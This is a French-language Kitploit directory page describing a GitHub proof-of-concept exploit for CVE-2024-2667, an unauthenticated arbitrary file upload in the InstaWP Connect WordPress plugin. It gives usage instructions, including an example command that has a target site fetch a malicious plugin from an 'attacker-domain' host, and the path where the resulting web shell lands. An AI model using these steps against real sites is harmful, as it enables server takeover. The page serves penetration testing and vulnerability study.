Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-2667-Poc — Exploit PoC pour CVE-2024-2667 : téléversement arbitraire de fichiers automatisé et accès au shell via une validation insuffisante des fichiers dans le point de terminaison de l'API REST du plugin WordPress InstaWP Connect. | Kitploit
Outils/GitHubGitHub/nxploited/cve-2024-2667-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingDéveloppement de Charges Utiles
GitHubnxploited/cve-2024-2667-poc

CVE-2024-2667-Poc

Exploit PoC pour CVE-2024-2667 : téléversement arbitraire de fichiers automatisé et accès au shell via une validation insuffisante des fichiers dans le point de terminaison de l'API REST du plugin WordPress InstaWP Connect.

Voir le dépôt
6il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-2667-Poc 🚀

Description

Le plugin InstaWP Connect – 1-click WP Staging & Migration pour WordPress est vulnérable à un téléchargement arbitraire de fichiers en raison d'une validation insuffisante des fichiers dans le point de terminaison d'API REST /wp-json/instawp-connect/v1/config dans toutes les versions jusqu'à la version 0.1.0.22 incluse. Cela permet à des attaquants non authentifiés de télécharger des fichiers arbitraires.

Guide d'utilisation du script ⚙️

Installer les prérequis

DescriptionDétailsIcône
Installer les bibliothèques requisesUtilisez pip pour installer les bibliothèques Python nécessaires : requests et beautifulsoup4.🛠️
Commande d'installationExécutez : pip install requests beautifulsoup4.📥

Exécuter le script

DescriptionDétailsIcône
Exécuter le scriptLancez le script en ligne de commande avec les arguments requis.🚀
Arguments requis- -up : URL du plugin (ex. : http://attacker-domain/malicious-plugin.zip).
- -u : URL du site WordPress cible (ex. : http://victim-domain/).🔧
Exemple de commandepython CVE-2024-2667.py -up http://attacker-domain/malicious-plugin.zip -u http://victim-domain/📜

Vérifier la vulnérabilité

DescriptionDétailsIcône
Vérification de la versionLe script examine le fichier readme.txt pour déterminer la version du plugin cible.🔍
Version vulnérableSi la version est <= 0.1.0.22, le script affiche : The site is vulnerable.⚠️
Version sûreSi la version est > 0.1.0.22, le script affiche : The site is not vulnerable.✅

Emplacement du shell

DescriptionDétailsIcône
Chemin du shellSi le téléchargement réussit, le shell sera accessible à :🐚
wp-content/plugins/instawp-connect/shell.php.

usage -help

usage: CVE-2024-2667.py [-h] -up URL_PLUGIN -u URL_TARGET

The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary file uploads due
to insufficient file validation in the /wp-json/instawp-connect/v1/config REST API endpoint in all versions up to, and
including, 0.1.0.22. This makes it possible for unauthenticated attackers to upload arbitrary files.

options:
  -h, --help            show this help message and exit
  -up URL_PLUGIN, --url_plugin URL_PLUGIN
                        URL of the plugin (e.g., http://attacker-domain/malicious-plugin.zip).
  -u URL_TARGET, --url_target URL_TARGET
                        URL of the target WordPress site (e.g., http://victim-domain/).
Télécharger l’outil